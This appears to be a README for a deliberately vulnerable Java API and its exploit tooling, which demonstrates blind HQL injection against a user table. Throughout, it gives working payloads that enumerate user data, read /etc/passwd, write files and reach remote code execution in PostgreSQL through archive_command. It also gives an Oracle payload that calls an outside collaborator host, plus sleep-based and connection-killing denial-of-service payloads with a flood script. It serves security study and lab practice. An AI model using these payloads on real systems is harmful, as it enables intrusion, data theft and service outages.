This project demonstrates a REST API vulnerable to Hibernate Query Language (HQL) injection and includes a Python script that exploits the boolean oracle to enumerate user IDs and field values from the User1 entity. Much of this project was AI guided (thanks ChatGPT!), using an iterative approach to refine the code and the exploit script with the occasional tweak by me :).
- Java 8 or higher
- Maven
- Python 3.x
-
Clone the repository (if not already done):
git clone git@github.com:pdstat/hqli.git cd hqli
-
Run the API:
./mvnw spring-boot:run
Or, on Windows:
.\mvnw.cmd spring-boot:run
The API will start on
http://localhost:8443.
The vulnerability is in AgentRepository.checkValidAgent:
private static final String CHECK_AGENT_EXISTS =
"select count(*) from com.pdstat.hqli.entity.User1 usr " +
"where usr.userId = '%s' or usr.altUserId = '%s'";
String hql = String.format(CHECK_AGENT_EXISTS, agentCode, agentCode);
Long count = em.createQuery(hql, Long.class).getSingleResult();
- The user-controlled
agentCodeis interpolated directly into the HQL string without parameters. - An attacker can inject quotes and boolean conditions to alter the WHERE clause.
- The API returns different responses based on whether any rows match:
- If count > 0: HTTP status code in JSON is
"400"with payload message"Agent Already Registered". - If no rows: JSON has status
"401"and empty payload. - If HQL breaks (syntax error), the exception text is returned in
messagewith status"401".
- If count > 0: HTTP status code in JSON is
This behavior creates a boolean oracle suitable for blind HQLi: the attacker can craft expressions so the query returns rows when the guessed condition is true and none when false.
The Python script wraps boolean expressions in a tautology/falsity frame:
- Wrapper:
0' or (<EXPR>) or '1'='2 - Exists helper:
exists ( from <Entity> u where <COND> )
Given the repository query template:
select count(*) from com.pdstat.hqli.entity.User1 usr
where usr.userId = '%s' or usr.altUserId = '%s'When the script sends an agentCode like 0' or (exists ( from com.pdstat.hqli.entity.User1 u where 1=1 )) or '1'='2, the final HQL becomes:
select count(*) from com.pdstat.hqli.entity.User1 usr
where usr.userId = '0' or (exists ( from com.pdstat.hqli.entity.User1 u where 1=1 )) or '1'='2'
or usr.altUserId = '0' or (exists ( from com.pdstat.hqli.entity.User1 u where 1=1 )) or '1'='2'Below are representative payloads per phase (shown pre-URL-encoding; the client encodes automatically):
-
Oracle probe (false):
- Payload:
0' or (exists ( from com.pdstat.hqli.entity.User1 u where 1=0 )) or '1'='2 - Effect: no matches -> JSON statusCode
"401".
- Payload:
-
Oracle probe (true):
- Payload:
0' or (exists ( from com.pdstat.hqli.entity.User1 u where 1=1 )) or '1'='2 - Effect: matches -> JSON statusCode
"400"with "Agent Already Registered".
- Payload:
-
Phase 1: userId prefix guess (e.g., does any
userIdstart with60?)- Payload:
0' or (exists ( from com.pdstat.hqli.entity.User1 u where u.userId like '60%' )) or '1'='2 - Final HQL inlines this payload twice (for both
userIdandaltUserId) as shown above; any row starting with 60 yields"400".
- Payload:
-
Phase 2: field presence for a specific user (is
emailIdpresent for60002650?)- Payload:
0' or (exists ( from com.pdstat.hqli.entity.User1 u where u.userId = '60002650' and u.emailId is not null )) or '1'='2
- Payload:
-
Phase 2: field length lower bound (is
length(emailId) >= 5?)- Payload:
0' or (exists ( from com.pdstat.hqli.entity.User1 u where u.userId = '60002650' and u.emailId is not null and length(u.emailId) >= 5 )) or '1'='2
- Payload:
-
Phase 3: field value prefix brute-force (does
emailIdstart withjo?)- Payload:
0' or (exists ( from com.pdstat.hqli.entity.User1 u where u.userId = '60002650' and u.emailId like 'jo%' )) or '1'='2
- Payload:
Note: The script safely doubles embedded quotes in guessed strings when needed (SQL-style ' -> ''), then the HTTP client URL-encodes the parameter.
Endpoint: GET /checkvalidagent?agentCode=...
Below are examples using PowerShell and curl. Replace the IDs to match users you created.
- User does not exist (oracle false case)
PowerShell:
Invoke-RestMethod -Uri "http://localhost:8443/checkvalidagent?agentCode=00000000" -Method Getcurl:
curl -k "http://localhost:8443/checkvalidagent?agentCode=00000000"Expected JSON shape (no match):
{"payload":{},"msgInfo":{"statusCode":"401","msgStatus":"failure","message":null}}- User exists (oracle true case)
PowerShell:
Invoke-RestMethod -Uri "http://localhost:8443/checkvalidagent?agentCode=60002650" -Method Getcurl:
curl -k "http://localhost:8443/checkvalidagent?agentCode=60002650"Expected JSON shape (match):
{"payload":{"statusMsg":{"statusMsg":"Agent Already Registered","pageName":"NewUser"}},"msgInfo":{"statusCode":"400","msgStatus":"failure","message":"Failed to register user"}}- Break the HQL with a single quote (syntax error)
PowerShell:
Invoke-RestMethod -Uri "http://localhost:8443/checkvalidagent?agentCode=60002650'" -Method Getcurl:
curl -k "http://localhost:8443/checkvalidagent?agentCode=60002650'"The repository catches the exception and returns it in the JSON message with status "401".
- Fix/abuse the HQL with a tautology (injection)
PowerShell:
Invoke-RestMethod -Uri "http://localhost:8443/checkvalidagent?agentCode=0'%20or%20'1'%3d'1" -Method Getcurl:
curl -k "http://localhost:8443/checkvalidagent?agentCode=0'%20or%20'1'%3d'1"This closes the quote and appends or '1'='1', making the WHERE clause always true, so the API responds as if a user exists (status "400").
The database is seeded with 10 users, you can however add more via a handy create endpoint. You can use curl or PowerShell:
curl -k -X POST "http://localhost:8443/create" \
-H "Content-Type: application/json" \
-d '{
"userId": "60002650",
"altUserId": "ALT001",
"dob": "1990-01-01",
"password": "pass1234",
"firstName": "John",
"lastName": "Doe",
"email": "john.doe@example.com"
}'
curl -k -X POST "http://localhost:8443/create" \
-H "Content-Type: application/json" \
-d '{
"userId": "60002925",
"altUserId": "ALT002",
"dob": "1992-02-02",
"password": "pass5678",
"firstName": "Jane",
"lastName": "Doe",
"email": "jane.doe@example.com"
}'$body1 = '{"userId": "60002650", "altUserId": "ALT001", "dob": "1990-01-01", "password": "pass1234", "firstName": "John", "lastName": "Doe", "email": "john.doe@example.com"}'
Invoke-RestMethod -Uri "http://localhost:8443/create" -Method Post -Body $body1 -ContentType "application/json"
$body2 = '{"userId": "60002925", "altUserId": "ALT002", "dob": "1992-02-02", "password": "pass5678", "firstName": "Jane", "lastName": "Doe", "email": "jane.doe@example.com"}'
Invoke-RestMethod -Uri "http://localhost:8443/create" -Method Post -Body $body2 -ContentType "application/json"After creating these users, you can run the Python script to enumerate them.
-
Install Python dependencies: If your script requires any packages (e.g.,
requests), install them:pip install requests
-
Run the script (basic):
python .\hqli-all.py --entity com.pdstat.hqli.entity.User1 --fields .\fields.txt
The script uses boolean-based HQLi to discover user IDs and brute-force selected properties.
-
Optional: enable debug logging of requests
python .\hqli-all.py --entity com.pdstat.hqli.entity.User1 --fields .\fields.txt --debug
-
Optional: ask AI to suggest additional likely fields (requires an OpenAI key)
$env:OPENAI_API_KEY = "<your key here>" python .\hqli-all.py --entity com.pdstat.hqli.entity.User1 --fields .\fields.txt --ai-mode --ai-field-count 15
You can find the features of the enumeration script below, note it has been developed very much in the context of this vulnerable API, and is not currently generic enough to work against arbitrary HQLi targets without modification.
--entity <name>(required): HQL entity to target, FQN or simple name (e.g.,com.pdstat.hqli.entity.User1).--fields <path>(required): Path to a text wordlist of field names to try; one per line. Lines can contain commas/whitespace and#comments.--entity-count <n>: Number of user IDs to enumerate; default 2.--debug: Verbose request log line per probe.--ai-mode: Use OpenAI to suggest extra likely fields based on the entity name; requiresOPENAI_API_KEYin the environment.--ai-field-count <n>: When--ai-modeis set, how many field names to fetch (default 10, clamped 1..50).--id-field <name>: Override: name of the identifier property (e.g.,userId,agentId). If omitted, the script tries to discover it.--resolve-entities: Probe a wordlist of entity names and print those that are mapped--entities <path>: Path to a text wordlist of entity names to try with--resolve-entities.--count-rows: Print total row count for --entity and exit.--detect-db: Detect database vendor and version viafunction()probes.--proxy <url>: Use an HTTP proxy (e.g.,http://<proxy_host>:<proxy_port>).
Other tuning knobs inside the script:
URL,PROXY,VERIFY_TLS,HEADERS: HTTP settings for the target endpoint.ENTITYID_MAXLEN,ENTITYID_CHARSET: Entity ID discovery parameters.DEFAULT_MAXLEN,CHARSET: Field value brute-force parameters.SLEEP_BETWEEN: Throttle between requests.
The script prints a total request counter at the end of a run to help understand traffic volume.
You can spin up the app against different databases using Docker:
-
H2 (in-memory, default config):
- Starts the app on http://localhost:8443
- JPA
ddl-auto=createensures schema is created at startup
docker compose up --build app-h2
-
MySQL 8:
- DB on localhost:3306, app on http://localhost:8443
- App is configured via env vars to use MySQL and
ddl-auto=create
docker compose up --build mysql app-mysql
-
PostgreSQL 16:
- DB on localhost:55432 (mapped to container 5432), app on http://localhost:8443
- App is configured via env vars to use PostgreSQL and
ddl-auto=create
docker compose up --build postgres app-postgres
-
MariaDB 11:
- DB on localhost:3307, app on http://localhost:8443
docker compose up --build mariadb app-mariadb
-
SQL Server 2022:
- DB on localhost:1433, app on http://localhost:8443
- Default SA password is set (SA_PASSWORD=Str0ngPwd!), app user hqli/hqli created by init.sql
docker compose up --build mssql mssql-init app-mssql
-
Oracle XE 21c:
- DB on localhost:11521 (container 1521), app on http://localhost:8443
- App user HQLI/hqli configured via env vars
docker compose up --build oracle app-oracle
-
HSQLDB (embedded file database):
- App uses a mounted volume with the DB files; app on http://localhost:8443
docker compose up --build app-hsqldb
-
Apache Derby (embedded file database):
- App uses a mounted volume with the DB files; app on http://localhost:8443
docker compose up --build app-derby
-
SQLite (file database):
- Sidecar creates a volume with /data/hqli.db; app on http://localhost:8443
docker compose up --build sqlite app-sqlite
Stop everything with:
docker compose down -vThanks to HQL's function() support, you can also try to detect the database vendor and version (see the --detect-db flag), and potentially exploit further via SQL functions. Here are some examples I've discovered across the different DBs supported by this project:
Note: A number of these examples assumes that the database user has sufficient privileges to execute the functions. Which as we know can sometimes be the case in misconfigured systems.
You can read files from the filesystem using the load_file function. For example, to read the /etc/passwd file, you can use the following payload:
True: (char at position 1 is 'r')
x' or function('substring', function('load_file','/etc/passwd'), 1, 1) = 'r' or '1'='2
True: (char at position 2 is 'o')
x' or function('substring', function('load_file','/etc/passwd'), 2, 1) = 'o' or '1'='2
True: (char at position 3 is 'o')
x' or function('substring', function('load_file','/etc/passwd'), 3, 1) = 'o' or '1'='2
True: (char at position 4 is 't')
x' or function('substring', function('load_file','/etc/passwd'), 4, 1) = 't' or '1'='2
etc.
Note the MySQL user has to be granted the FILE privilege to read files outside of the MySQL data directory. In this project the hqli user is granted this privilege in the docker/mysql/init.sql file. The --secure-file-priv= option in the docker-compose.yml file disables the secure file privilege restriction, allowing reading files from anywhere the MySQL server user has access to.
You can also use the sleep function to cause a delay in the response, which could be used for a denial of service attack. For example, to sleep for 10 seconds, you can use the following payload:
x' or (function('sleep',10)=0) or '1'='2
Sending this continuously will flood the JDBC connection pool and cause a denial of service. See the flood.py script for an example of how to do this.
Similar to how this projects script exfiltrates data via boolean HQLi, you can also read files from the filesystem using the pg_read_file function. For example, to read the /etc/passwd file, you can use the following payload:
True: (char at position 1 is 'r')
x' or function('substring', function('pg_read_file','/etc/passwd'), 1, 1) = 'r' or '1'='2
True: (char at position 2 is 'o')
x' or function('substring', function('pg_read_file','/etc/passwd'), 2, 1) = 'o' or '1'='2
True: (char at position 3 is 'o')
x' or function('substring', function('pg_read_file','/etc/passwd'), 3, 1) = 'o' or '1'='2
True: (char at position 4 is 't')
x' or function('substring', function('pg_read_file','/etc/passwd'), 4, 1) = 't' or '1'='2
etc.
In PostgreSQL you can write files to the filesystem using the lo_export function, which exports a large object to a file.
To export a large object into an operating system file, call
int lo_export(PGconn *conn, Oid lobjId, const char *filename);
The lobjId argument specifies the OID of the large object to export and the filename argument specifies the operating system name of the file. Note that the file is written by the client interface library, not by the server. Returns 1 on success, -1 on failure.
These two functions read and write files in the server's file system, using the permissions of the database's owning user. Therefore, by default their use is restricted to superusers. In contrast, the client-side import and export functions read and write files in the client's file system, using the permissions of the client program.
In the case of this project the PostgreSQL JDBC driver is configured with the same credentials as the database user configured in the docker-compose.yml file, which is the hqli user. So any files written to the filesystem will be written to the PostgreSQL server's filesystem.
These objects exist in the pg_largeobject table. From the function signature above we would need to know the OID of the large object we want to export.
However it seems it's possible to create a large object from a string using the lo_from_bytea function and then stuff its OID into a Global Unified Config (GUC) variable.
For example the following payload
x' OR function('set_config','attk.loid',function('concat', function('lo_from_bytea', 0, function('decode','aGVsbG8K','base64')), ''),false) IS NOT NULL OR '1'='2
Creates a GUC variable called attk.loid with the OID of a large object containing the string "hello\n".
And then the export
x' OR function('lo_export',function('int4', function('current_setting','attk.loid')),'/tmp/dump.bin') >= 0 OR '1'='2
Will write the contents of the large object to a file called /tmp/dump.bin on the filesystem of the PostgreSQL server.
This shows that we have the ability to write arbitrary files to the filesystem in directories that the PostgreSQL server has write access to.
This took me down another rabbit hole! So it seems from this RCE can be achieved. (Note: this example assumes archive_mode is enabled in PostgreSQL, which it is in the Docker Compose config for PostgreSQL in this project).
- Create a large object containing a base64 encoded script
#!/usr/bin/bash\nid > /tmp/pwned\n
x' OR function('set_config','attk.loid',function('concat',function('lo_from_bytea',0,function('decode','IyEvdXNyL2Jpbi9iYXNoCmlkID4gL3RtcC9wd25lZAo=','base64')), ''), false) IS NOT NULL OR '1'='2
- Write the large object to a file called
/tmp/p.sh
x' OR function('lo_export',function('int4', function('current_setting','attk.loid')),'/tmp/p.sh') >= 0 OR '1'='2
- Store a new
archive_commandin a GUC variable (archive_command = 'bash /tmp/p.sh %p %f'\n)
x' OR function('set_config','attk.loid',function('concat',function('lo_from_bytea',0,function('decode','YXJjaGl2ZV9jb21tYW5kID0gJ2Jhc2ggL3RtcC9wLnNoICVwICVmJwo=','base64')), ''), false) IS NOT NULL OR '1'='2
- Read the LO OID from the session GUC, casts it to an int, and uses lo_export to overwrite $PGDATA/postgresql.auto.conf
x' OR function('lo_export',function('int4', function('current_setting','attk.loid')),function('concat', function('current_setting','data_directory'), '/postgresql.auto.conf')) >= 0 OR '1'='2
- Reload the config
x' OR function('pg_reload_conf') = true OR '1'='2
- Trigger a WAL segment switch to execute the archive command
x' OR function('pg_switch_wal') IS NOT NULL OR '1'='2
We could also send a truthy payload to check for existence of the /tmp/pwned file to confirm the RCE worked.
x' OR function('length', function('pg_read_file','/tmp/pwned')) > 0 OR '1'='2
PostgreSQL has the pg_sleep function to cause a delay in the response, which could be used for a denial of service attack. For example, to sleep for 10 seconds, you can use the following payload:
x' or (function('pg_sleep',10)=0) or '1'='2
Sending this continuously will flood the JDBC connection pool and cause a denial of service. See the flood.py script for an example of how to do this.
With the thanks of AI I discovered the existence of a PostgreSQL property called search_path, which lead to some interesting attack vectors affecting both integrity and availability.
The PostgreSQL documentation has this to say about search_path:
5.10.3. The Schema Search Path Qualified names are tedious to write, and it's often best not to wire a particular schema name into applications anyway. Therefore tables are often referred to by unqualified names, which consist of just the table name. The system determines which table is meant by following a search path, which is a list of schemas to look in. The first matching table in the search path is taken to be the one wanted. If there is no match in the search path, an error is reported, even if matching table names exist in other schemas in the database.
The ability to create like-named objects in different schemas complicates writing a query that references precisely the same objects every time. It also opens up the potential for users to change the behavior of other users' queries, maliciously or accidentally. Due to the prevalence of unqualified names in queries and their use in PostgreSQL internals, adding a schema to search_path effectively trusts all users having CREATE privilege on that schema. When you run an ordinary query, a malicious user able to create objects in a schema of your search path can take control and execute arbitrary SQL functions as though you executed them.
To be able to set the parameter usually the method to use is with a SQL SET command. Here's another snippet from the PostgreSQL docs:
SET search_path TO myschema;Then we no longer have access to the public schema without explicit qualification.
However, the function() support in HQL allows us to call the set_config function, which can be used to set the search_path parameter. The function signature is as follows:
set_config(setting_name text, new_value text, is_local boolean) returns text
Taking a step back for a minute, using the checkvalidagent endpoint in this project with a user that exists. For a request to http://127.0.0.1:8443/checkvalidagent?agentCode=60002650
Returns a response of
{
"payload": {
"statusMsg": {
"statusMsg": "Agent Already Registered",
"pageName": "NewUser"
}
},
"msgInfo": {
"message": "Failed to register user",
"msgStatus": "failure",
"statusCode": "400"
}
}As an attacker we can use the function('set_config',...) to set the search_path to a non-existent schema, which will cause the query to fail with an error indicating that the users relation does not exist. This is because the users table is in the public schema by default, and by changing the search_path, we are effectively hiding it from the query. E.g. a request to http://127.0.0.1:8443/checkvalidagent?agentCode=0'+OR+function('set_config','search_path','attk',+false)+=+'attk'+OR+'1'='2 will break all further requests for this session. The session being the connection to the database, which is reused by the application. Re-requesting http://127.0.0.1:8443/checkvalidagent?agentCode=60002650 now returns
{
"payload": {
"statusMsg": null
},
"msgInfo": {
"message": "org.hibernate.exception.SQLGrammarException: JDBC exception executing SQL [select count(*) from users u1_0 where u1_0.user_id='60002650' or u1_0.alt_user_id='60002650'] [ERROR: relation \"users\" does not exist\n Position: 22] [n/a]",
"msgStatus": "failure",
"statusCode": "401"
}
}Woops!
To kill a PostgreSQL backend process, you can use the pg_terminate_backend function. This function requires the process ID (PID) of the backend you want to terminate. Here's an example of how to use it:
SELECT pg_terminate_backend(<pid>);You can find the PID of a backend process by querying the pg_stat_activity view:
SELECT pid, usename, application_name, client_addr, state
FROM pg_stat_activity;I tested this out by first using the psql command line tool to connect to the PostgreSQL database via the terminal of the running Docker container. Then I ran the following query to find some active connections:
SELECT pid, usename, application_name
FROM pg_stat_activity;The process with PID 990 is my connection from psql. I can terminate this connection by sending the following payload to the vulnerable application:
x' or function('pg_terminate_backend', 990) = true or '1'='2
From the terminal I then tried to re-run the query and saw the my connection had been terminated:
It would be quite simple to permanently fuzz PID's and create a permanent denial of service condition on the database server.
Note the docs has the following to say about this function:
You can execute this against another backend that has exactly the same role as the user calling the function. In all other cases, you must be a superuser.
This worked for me as I connected to the database as the hqli user and the backend processes were also running as hqli.
This was another case where the right conditions need to be in place in order for an attacker to exploit the vulnerability. By default the Oracle docker container did not have the correct ACL's to allow outbound HTTP requests. For demonstration purposes I've obviously configured that.
With that in mind a payload such as the following can make outbound HTTP requests to an attacker controlled server:
0' or (function('LENGTH',function('UTL_HTTP.REQUEST','http://onfdv7d614cf08kpkqhcvxgxgomga6yv.oastify.com:80/'))>0) or '1'='2
Hits in Burp Collaborator:
In the context of this injection for MSSQL we can't use the WAITFOR DELAY command directly as it results in a syntax error.
However we can use expensive string based operations to cause a delay in the response, which could be used for a denial of service attack. For example, to cause a delay, you can use the following payload:
0' or function('DATALENGTH', function('REPLICATE', function('CONCAT', function('NEWID'), function('REPLICATE','A',4000), function('REPLICATE','B',4000), function('REPLICATE','C',4000), function('REPLICATE','D',4000)), 50000))>0 or '1'='2
This takes +11 seconds for a single response to return. The flood.py script can be used to continuously send this payload to the server, which will flood the JDBC connection pool and cause a denial of service.
The flood.py script can be used to continuously send a payload to the vulnerable endpoint, which will flood the JDBC connection pool and cause a denial of service. I hadn't intended to develop this initially, but I needed a way of testing the availability attack vectors, so I whipped this up quickly. Feature flags are:
--url: Base URL (defaults per target) e.g. http://127.0.0.1:8443--concurrency: Max simultaneous open connections (default 200)--interval: Delay between scheduling requests (seconds, default 0.0)--sleep: DB sleep seconds inside injected payload (if supported by chosen DB, default 10)--db: Target DB type to tailor sleep function (default: mysql)- Supported values:
mysql,postgres,mssql,oracle,h2,hsqldb
- Supported values:
--connect-timeout: TCP connect timeout (default 3.0)--write-timeout: Write/drain timeout (default 3.0)--linger: Optional delay after sending before closing (default 0.0)--progress: Print per-second progress
Disclaimer: This project is for educational and testing purposes only. Do not use on systems without proper authorization.




